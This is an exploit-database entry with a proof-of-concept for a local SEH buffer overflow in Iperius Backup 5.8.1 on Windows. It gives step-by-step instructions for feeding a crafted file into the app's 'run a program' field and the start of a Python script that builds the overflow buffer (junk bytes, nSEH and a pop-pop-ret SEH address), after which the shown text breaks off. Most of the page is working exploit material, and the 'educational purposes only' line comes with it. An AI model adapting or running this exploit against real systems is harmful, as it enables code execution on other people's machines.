Exploits / Vulnerability Discovered : 2018-12-27 |
Type : local |
Platform : windows_x86
This exploit / vulnerability Iperius backup 5.8.1 buffer overflow (seh) is for educational purposes only and if it is used you will do on your own risk!
# PoC
# 1. run script
# 2. open app and create backup job
# 3. on other processes tab, select 'run a program or open external file'
# 4. copy/paste iperius.txt contents into file location
# 5. select ok to complete creating backup job
# 6. run backup job
# 7. app crashes; pop calc
#!/usr/bin/python
filename="iperius.txt"
junk = "\x71" * 306
#popad
nseh = "\x61\x62"
#0x005b004a
#pop esi # pop ebx # ret | startnull,unicode,asciiprint,ascii Iperius.exe
seh = "\x4a\x5b"